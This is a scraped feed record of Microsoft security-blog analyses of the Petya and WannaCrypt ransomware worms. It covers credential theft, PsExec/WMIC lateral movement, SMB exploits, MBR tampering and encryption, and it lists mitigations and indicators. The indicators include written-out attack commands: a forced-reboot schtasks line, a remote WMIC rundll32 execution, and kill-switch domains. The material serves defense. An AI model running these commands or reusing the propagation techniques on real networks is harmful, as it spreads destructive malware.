_dllhost.dat_) from an embedded resource within the malware. It then scans the local network for _admin$_ shares, copies itself across the network, and executes the newly copied malware binary remotely using PSEXEC.\n\nIn addition to credential dumping, the malware also tries to steal credentials by using the _CredEnumerateW_ function to get all the other user credentials potentially stored on the credential store. If a credential name starts with _\"TERMSRV/\"_ and the type is set as 1 (generic) it uses that credential to propagate through the network.\n\n\n\n_Ransomware code responsible for accessing \\\\\\Admin$ shares on different machines_\n\nThis ransomware also uses the Windows Management Instrumentation Command-line (WMIC) to find remote shares (using _NetEnum/NetAdd_) to spread to. It uses either a duplicate token of the current user (for existing connections), or a username/password combination (spreading through legit tools).\n\n\n\n_Screenshot showing launch of malware on a remote machine using WMIC_\n\n## Lateral movement using EternalBlue and EternalRomance\n\nThe new ransomware can also spread using an exploit for the Server Message Block (SMB) vulnerability [CVE-2017-0144](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>) (also known as EternalBlue), which was fixed in [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) and was also exploited by [WannaCrypt](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>) to spread to out-of-date machines. In addition, this ransomware also uses a second exploit for [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) (also known as EternalRomance, and fixed by the same bulletin).\n\nWe\u2019ve seen this ransomware attempt to use these exploits by generating SMBv1 packets (which are all _XOR 0xCC_ encrypted) to trigger these vulnerabilities at the following address of the malware code:\n\n\n\n\n\nThese two exploits were leaked by a group called [Shadow Brokers](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>). However, it is important to note that both of these vulnerabilities have been fixed by Microsoft in [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) on March 14, 2017.\n\nMachines that are patched against these exploits (with [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) or [have disabled SMBv1](<https://support.microsoft.com/kb/2696547>) are not affected by this particular spreading mechanism. Please refer to our previous [blog](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) for details on these exploits and how modern Windows 10 mitigations can help to contain similar threats.\n\n## Encryption\n\nThis ransomware\u2019s encryption behavior depends on the malware process privilege level and the processes found to be running on the machine. It does this by employing a simple XOR-based hashing algorithm on the process names, and checks against the following hash values to use as a behavior exclusion:\n\n\n\n * _0x6403527E_ or _0x651B3005_ \u2013 if these hashes of process names are found running on the machine, then the ransomware does not do SMB exploitation.\n\n\n\n * _0x2E214B44 _ \u2013 if a process with this hashed name is found, the ransomware trashes the first 10 sectors of _\\\\\\\\\\\\\\\\.\\\\\\PhysicalDrive0_, including the MBR\n\n\n\nThis ransomware then writes to the master boot record (MBR) and then sets up the system to reboot. It sets up scheduled tasks to shut down the machine after at least 10 minutes past the current time. The exact time is random _(GetTickCount())_. For example:\n\n_schtasks /Create /SC once /TN \"\" /TR \"&lt;system folder&gt;\\shutdown.exe /r /f\" /ST 14:23_\n\nAfter successfully modifying the MBR, it displays the following fake system message, which notes a supposed error in the drive and shows the fake integrity checking:\n\n\n\nIt then displays this ransom note:\n\n\n\nOnly if the malware is running with highest privilege (i.e., with _SeDebugPrivilege_ enabled), it tries to overwrite the MBR code.\n\nThis ransomware attempts to encrypt all files with the following file name extensions in all folders in all fixed drives, except for _C:\\Windows_:\n\n.3ds | .7z | .accdb | .ai \n---|---|---|--- \n.asp | .aspx | .avhd | .back \n.bak | .c | .cfg | .conf \n.cpp | .cs | .ctl | .dbf \n.disk | .djvu | .doc | .docx \n.dwg | .eml | .fdb | .gz \n.h | .hdd | .kdbx | .mail \n.mdb | .msg | .nrg | .ora \n.ost | .ova | .ovf | .pdf \n.php | .pmf | .ppt | .pptx \n.pst | .pvi | .py | .pyc \n.rar | .rtf | .sln | .sql \n.tar | .vbox | .vbs | .vcb \n.vdi | .vfd | .vmc | .vmdk \n.vmsd | .vmx | .vsdx | .vsv \n.work | .xls | .xlsx | .xvd \n.zip | | | \n \nIt uses file mapping APIs instead of a usual _ReadFile()_/_WriteFile()_ APIs:\n\n\n\nUnlike most other ransomware, this threat does not append a new file name extension to encrypted files. Instead, it overwrites the said files.\n\nThe AES key generated for encryption is per machine, per fixed drive, and gets exported and encrypted using the embedded 2048-bit RSA public key of the attacker.\n\n\n\n_Embedded RSA public key_\n\n\n\n_Code exporting the AES 128 bit key per machine, per fixed drive in the machine and encrypting it using embedded RSA public key during export_\n\nThe unique key used for files encryption (AES) is added, in encrypted form, to the _README.TXT_ file the threat writes under section _\"Your personal installation key:\"_.\n\nBeyond encrypting files, this ransomware also attempts to infect the MBR or destroy certain sectors of VBR and MBR:\n\n\n\nAfter completing its encryption routine, this ransomware drops a text file called _README.TXT_ in each fixed drive. The said file has the following text:\n\n\n\nThis ransomware also clears the System, Setup, Security, Application event logs and deletes NTFS journal info.\n\n## Detection and investigation with Windows Defender Advanced Threat Protection\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) is a post-breach solution and offers by-design detections for this attack without need of any signature updates. Windows Defender ATP sensors constantly monitor and collect telemetry from the endpoints and offers machine-learning detections for common lateral movement techniques and tools used by this ransomware, including, for example, the execution of _PsExec.exe_ with different filename, and the creation of the _perfc.dat_ file in remote shares (UNC) paths.\n\nToday, without the need of additional updates, an infected machine may look like this:\n\n\n\nThe second alert targets the distribution of the ransomware\u2019s .dll file over the network. This event provides helpful information during investigation as it includes the User context that was used to move the file remotely. This user has been compromised and could represent the user associated with patient-zero:\n\n\n\nWith Windows Defender ATP, enterprise customers are well-equipped to quickly identify Petya outbreaks, investigate the scope of the attack, and respond early to malware delivery campaigns.\n\n## Protection against this new ransomware attack\n\nKeeping your [Windows 10](<https://www.microsoft.com/en-us/windows/windows-10-upgrade>) [up-to-date](<https://support.microsoft.com/en-us/help/311047/how-to-keep-your-windows-computer-up-to-date>) gives you the benefits of the latest features and proactive mitigations built into the latest versions of Windows. In Creators Update, we further [hardened Windows 10 against ransomware attacks](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>) by introducing new next-gen technologies and enhancing existing ones.\n\nAs another layer of protection, [Windows 10 S](<https://www.microsoft.com/en-us/windows/windows-10-s>) only allows apps that come from the Windows Store to run. Windows 10 S users are further protected from this threat.\n\nWe recommend customers that have not yet installed security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) to do so as soon as possible. Until you can apply the patch, we also recommend two possible workarounds to reduce the attack surface:\n\n * Disable SMBv1 with the steps documented at [Microsoft Knowledge Base Article 2696547](<https://support.microsoft.com/kb/2696547>) and as [recommended previously](<https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/>)\n * Consider adding a rule on your router or firewall to block incoming SMB traffic on port 445\n\nAs the threat targets ports 139 and 445, you customers can block any traffic on those ports to prevent propagation either into or out of machines in the network. You can also disable remote WMI and file sharing. These may have large impacts on the capability of your network, but may be suggested for a very short time period while you assess the impact and [apply definition updates](<https://www.microsoft.com/security/portal/definitions/adl.aspx>).\n\nAside from exploiting vulnerabilities, this threat can also spread across networks by stealing credentials, which it then uses to attempt to copy and execute a copy on remote machines. You can prevent credential theft by ensuring credential hygiene across the organization. [Secure privileged access](<https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access>) to prevent the spread of threats like Petya and to protect your organization\u2019s assets. Use [Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) to protect domain credentials stored in the Windows Credential Store.\n\nWindows Defender Antivirus detects this threat as [Ransom:Win32/Petya](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/entry.aspx?Name=Ransom:Win32/Petya>) as of the [1.247.197.0 update](<https://www.microsoft.com/security/portal/definitions/adl.aspx>). Windows Defender Antivirus uses cloud-based protection, helping to protect you from the latest threats.\n\nFor enterprises, use [Device Guard](<https://technet.microsoft.com/itpro/windows/keep-secure/device-guard-deployment-guide>) to lock down devices and provide kernel-level virtualization-based security, allowing only trusted applications to run, effectively preventing malware from running.\n\nMonitor networks with [Windows Defender Advanced Threat Protection](<http://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>), which alerts security operations teams about suspicious activities. Download this playbook to see how you can leverage Windows Defender ATP to detect, investigate, and mitigate ransomware in networks: [Windows Defender Advanced Threat Protection \u2013 Ransomware response playbook](<https://www.microsoft.com/en-us/download/details.aspx?id=55090>).\n\n## Resources\n\nMSRC blog: <https://blogs.technet.microsoft.com/msrc/2017/06/28/update-on-petya-malware-attacks/>\n\nNext-generation ransomware protection with Windows 10 Creators Update: <https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>\n\nDownload English language security updates: [Windows Server 2003 SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows Server 2003 SP2 x86,](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x86-custom-enu_f617caf6e7ee6f43abe4b386cb1d26b3318693cf.exe>) [Windows XP SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows XP SP3 x86](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-custom-enu_eceb7d5023bbb23c0dc633e46b9c2f14fa6ee9dd.exe>), [Windows XP Embedded SP3 x86](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-embedded-custom-enu_8f2c266f83a7e1b100ddb9acd4a6a3ab5ecd4059.exe>), [Windows 8 x86,](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x86_a0f1c953a24dd042acc540c59b339f55fb18f594.msu>) [Windows 8 x64](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x64_f05841d2e94197c2dca4457f1b895e8f632b7f8e.msu>)\n\nDownload localized language security updates: [Windows Server 2003 SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=d3cb7407-3339-452e-8371-79b9c301132e>), [Windows Server 2003 SP2 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=350ec04d-a0ba-4a50-9be3-f900dafeddf9>), [Windows XP SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=5fbaa61b-15ce-49c7-9361-cb5494f9d6aa>), [Windows XP SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=7388c05d-9de6-4c6a-8b21-219df407754f>), [Windows XP Embedded SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=a1db143d-6ad2-4e7e-9e90-2a73316e1add>), [Windows 8 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=6e2de6b7-9e43-4b42-aca2-267f24210340>), [Windows 8 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=b08bb3f1-f156-4e61-8a68-077963bae8c0>)\n\nMS17-010 Security Update: <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>\n\nGeneral information on ransomware: <https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>\n\nSecurity for IT Pros: <https://technet.microsoft.com/en-us/security/default>\n\n## Indicators of Compromise\n\nNetwork defenders may search for the following indicators:\n\n**File indicators**\n\n * 34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d\n * 9717cfdc2d023812dbc84a941674eb23a2a8ef06\n * 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf\n * 56c03d8e43f50568741704aee482704a4f5005ad\n\n**Command lines**\n\nIn environments where command-line logging is available, the following command lines may be searched:\n\n * Scheduled Reboot Task: Petya schedules a reboot for a random time between 10 and 60 minutes from the current time \n * _schtasks /Create /SC once /TN \"\" /TR \"&lt;system folder&gt;\\shutdown.exe /r /f\" /ST &lt;time&gt;_\n * _cmd.exe /c schtasks /RU \"SYSTEM\" /Create /SC once /TN \"\" /TR \"C:\\Windows\\system32\\shutdown.exe /r /f\" /ST &lt;time&gt;_\n\nThis may be surfaced by searching for EventId 106 (General Task Registration) which captures tasks registered with the Task Scheduler service.\n\n * Lateral Movement (Remote WMI) \n * _\"process call create \\\"C:\\\\\\Windows\\\\\\System32\\\\\\rundll32.exe \\\\\\\\\\\"C:\\\\\\Windows\\\\\\perfc.dat\\\\\\\\\\\" #1\"_\n\n**Network indicators**\n\nIn environments where NetFlow data are available, this ransomware\u2019s subnet-scanning behavior may be observed by looking for the following:\n\n * Workstations scanning ports tcp/139 and tcp/445 on their own local (/24) network scope\n * Servers (in particular, domain controllers) scanning ports tcp/139 and tcp/445 across multiple /24 scopes\n\n_ _", "title": "New ransomware, old techniques: Petya adds worm capabilities", "cvelist": ["CVE-2017-0144", "CVE-2017-0145"], "_object_type": "robots.models.rss.RssBulletin", "viewCount": 1049, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0144"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD"]}, {"type": "mmpc", "idList": ["MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:4A6B394DCAF12E05136AE087248E228C"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:EA407B51944632C248FEB495594123EA", "THN:E18080D17705880B2E7B69B8AB125EA9", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142602", "PACKETSTORM:142603", "PACKETSTORM:142548"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:42030"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27803", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0145"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "avleonov", "idList": ["AVLEONOV:98069D08913ADA26D85B10C827D3FE97", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"]}, {"type": "fireeye", "idList": ["FIREEYE:57B0F10A16E18DC672833B1812005B76", "FIREEYE:399092589F455855881447C60B56C21A"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mssecure", "idList": ["MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2017-09-15T09:08:41", "rev": 2}, "score": {"value": 7.6, "vector": "NONE", "modified": "2017-09-15T09:08:41", "rev": 2}}, "reporter": "msft-mmpc", "bulletinFamily": "blog", "objectVersion": "1.5", "type": "mmpc", "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hash": "187de40875213635b40951240733ecd480e8174a7d8a8f46ce25caa0492dc93e", "hashmap": [{"key": "bulletinFamily", "hash": "126ac9f6149081eb0e97c2e939eaad52"}, {"key": "cvelist", "hash": "2ed33d64012a372c3bd45d454ea4fb3b"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "ff956db5f2cf47d328e1cbc09bc91885"}, {"key": "href", "hash": "10dc22e225dabcc0845efb8de70d835b"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "696a19be15ef6061e7b6c7e4759f53bb"}, {"key": "published", "hash": "696a19be15ef6061e7b6c7e4759f53bb"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "9158c03164fb6db0c440fdb287e68855"}, {"key": "title", "hash": "baa30f28b70995adbfcbcd6ddaba2ec0"}, {"key": "type", "hash": "2206031ddfa442c2eb57dd17e9fcf174"}], "scheme": null}, {"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/", "references": [], "enchantments_done": [], "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "id": "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "history": [{"bulletin": {"bulletinFamily": "blog", "cvelist": ["CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "description": "_(Note: Read our latest comprehensive report on ransomware: _[**_Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene_**](<https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/>)_.)_\n\n \n\nOn May 12, 2017 we detected a new ransomware that spreads like a worm by leveraging vulnerabilities that have been previously fixed. While security updates are automatically applied in most computers, some users and enterprises may delay deployment of patches. Unfortunately, the ransomware, known as [WannaCrypt](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/WannaCrypt>), appears to have affected computers that have not applied the patch for these vulnerabilities. While the attack is unfolding, we remind users to install [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) if they have not already done so.\n\nMicrosoft antimalware telemetry immediately picked up signs of this campaign. Our expert systems gave us visibility and context into this new attack as it happened, allowing [Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) to deliver real-time defense. Through automated analysis, machine learning, and predictive modeling, we were able to rapidly protect against this malware.\n\nIn this blog, we provide an early analysis of the end-to-end ransomware attack. Please note this threat is still under investigation. The attack is still active, and there is a possibility that the attacker will attempt to react to our detection response.\n\n## Attack vector\n\nRansomware threats do not typically spread rapidly. Threats like WannaCrypt (also known as WannaCry, WanaCrypt0r, WCrypt, or WCRY) usually leverage social engineering or email as primary attack vector, relying on users downloading and executing a malicious payload. However, in this unique case, the ransomware perpetrators used publicly available exploit code for the patched SMB \"[EternalBlue](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>)\" vulnerability, [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>), which can be triggered by sending a specially crafted packet to a targeted SMBv1 server. This vulnerability was fixed in security bulletin [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), which was released on March 14, 2017.\n\nWannaCrypt\u2019s spreading mechanism is borrowed from [well-known](<https://packetstormsecurity.com/files/142464/MS17-010-SMBv1-SrvOs2FeaToNt-OOB-Remote-Code-Execution.html>) [public SMB exploits](<https://github.com/RiskSense-Ops/MS17-010>), which armed this regular ransomware with worm-like functionalities, creating an entry vector for machines still unpatched even after the fix had become available.\n\nThe exploit code used by WannaCrypt was designed to work only against unpatched Windows 7 and Windows Server 2008 (or earlier OS) systems, so [Windows 10 PCs are not affected by this attack](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>).\n\nWe haven\u2019t found evidence of the exact initial entry vector used by this threat, but there are two scenarios that we believe are highly possible explanations for the spread of this ransomware:\n\n * Arrival through social engineering emails designed to trick users to run the malware and activate the worm-spreading functionality with the SMB exploit\n * Infection through SMB exploit when an unpatched computer is addressable from other infected machines\n\n## Dropper\n\nThe threat arrives as a dropper Trojan that has the following two components:\n\n 1. A component that attempts to exploit the SMB CVE-2017-0145 vulnerability in other computers\n 2. The ransomware known as WannaCrypt\n\nThe dropper tries to connect the following domains using the _API InternetOpenUrlA()_:\n\n * www[.]iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com\n * www[.]ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com\n * www[x].iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]test\n\nIf connection to the domains is successful, the dropper does not infect the system further with ransomware or try to exploit other systems to spread; it simply stops execution. However, if the connection fails, the threat proceeds to drop the ransomware and creates a service on the system.\n\nIn other words, unlike in most malware infections, **IT Administrators should NOT block these domains**. Note that the malware is not proxy-aware, so a local DNS record may be required. This does not need to point to the Internet, but can resolve to any accessible server which will accept connections on TCP 80.\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt11.png>)[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt1.png>)\n\nThe threat creates a service named _mssecsvc2.0_, whose function is to exploit the SMB vulnerability in other computers accessible from the infected system:\n\n_Service Name: mssecsvc2.0_ \n_Service Description: (Microsoft Security Center (2.0) Service)_ \n_Service Parameters: \u201c-m security\u201d_\n\n[](<https://msdnshared.blob.core.windows.net/media/2017/05/WannaCrypt2.png>)\n\n## WannaCrypt ransomware\n\nThe ransomware component is a dropper that contains a password-protected .zip archive in its resource section. The document encryption routine and the files in the .zip archive contain support tools, a decryption tool, and the ransom message. In the samples we analyzed, the password for the .zip archive is \"WNcry@2ol7\".\n\nWhen run, WannaCrypt creates the following registry keys:\n\n * _HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\\\\&lt;random string&gt; = \"&lt;malware working directory&gt;\\tasksche.exe\"_\n * _HKLM\\SOFTWARE\\WanaCrypt0r\\\\\\wd = \"&lt;malware working directory&gt;\"_\n\nIt changes the wallpaper to a ransom message by modifying the following registry key:\n\n * _HKCU\\Control Panel\\Desktop\\Wallpaper: \"&lt;malware working directory&gt;\\@WanaDecryptor@.bmp\"_\n\nIt creates the following files in the malware's working directory:\n\n * _00000000.eky_\n * _00000000.pky_\n * _00000000.res_\n * _274901494632976.bat_\n * _@Please_Read_Me@.txt_\n * _@WanaDecryptor@.bmp_\n * _@WanaDecryptor@.exe_\n * _b.wnry_\n * _c.wnry_\n * _f.wnry_\n * _m.vbs_\n * _msg\\m_bulgarian.wnry_\n * _msg\\m_chinese (simplified).wnry_\n * _msg\\m_chinese (traditional).wnry_\n * _msg\\m_croatian.wnry_\n * _msg\\m_czech.wnry_\n * _msg\\m_danish.wnry_\n * _msg\\m_dutch.wnry_\n * _msg\\m_english.wnry_\n * _msg\\m_filipino.wnry_\n * _msg\\m_finnish.wnry_\n * _msg\\m_french.wnry_\n * _msg\\m_german.wnry_\n * _msg\\m_greek.wnry_\n * _msg\\m_indonesian.wnry_\n * _msg\\m_italian.wnry_\n * _msg\\m_japanese.wnry_\n * _msg\\m_korean.wnry_\n * _msg\\m_latvian.wnry_\n * _msg\\m_norwegian.wnry_\n * _msg\\m_polish.wnry_\n * _msg\\m_portuguese.wnry_\n * _msg\\m_romanian.wnry_\n * _msg\\m_russian.wnry_\n * _msg\\m_slovak.wnry_\n * _msg\\m_spanish.wnry_\n * _msg\\m_swedish.wnry_\n * _msg\\m_turkish.wnry_\n * _msg\\m_vietnamese.wnry_\n * _r.wnry_\n * _s.wnry_\n * _t.wnry_\n * _TaskData\\Tor\\libeay32.dll_\n * _TaskData\\Tor\\libevent-2-0-5.dll_\n * _TaskData\\Tor\\libevent_core-2-0-5.dll_\n * _TaskData\\Tor\\libevent_extra-2-0-5.dll_\n * _TaskData\\Tor\\libgcc_s_sjlj-1.dll_\n * _TaskData\\Tor\\libssp-0.dll_\n * _TaskData\\Tor\\ssleay32.dll_\n * _TaskData\\Tor\\taskhsvc.exe_\n * _TaskData\\Tor\\tor.exe_\n * _TaskData\\Tor\\zlib1.dll_\n * _taskdl.exe_\n * _taskse.exe_\n * _u.wnry_\n\nWannaCrypt may also create the following files:\n\n * _%SystemRoot%\\tasksche.exe_\n * _%SystemDrive%\\intel\\&lt;random directory name&gt;\\tasksche.exe_\n * _%ProgramData%\\&lt;random directory name&gt;\\tasksche.exe_\n\nIt may create a randomly named service that has the following associated ImagePath: _\"cmd.exe /c \"&lt;malware working directory&gt;\\tasksche.exe\"\"_.\n\nIt then searches the whole computer for any file with any of the following file name extensions: _.123, .jpeg , .rb , .602 , .jpg , .rtf , .doc , .js , .sch , .3dm , .jsp , .sh , .3ds , .key , .sldm , .3g2 , .lay , .sldm , .3gp , .lay6 , .sldx , .7z , .ldf , .slk , .accdb , .m3u , .sln , .aes , .m4u , .snt , .ai , .max , .sql , .ARC , .mdb , .sqlite3 , .asc , .mdf , .sqlitedb , .asf , .mid , .stc , .asm , .mkv , .std , .asp , .mml , .sti , .avi , 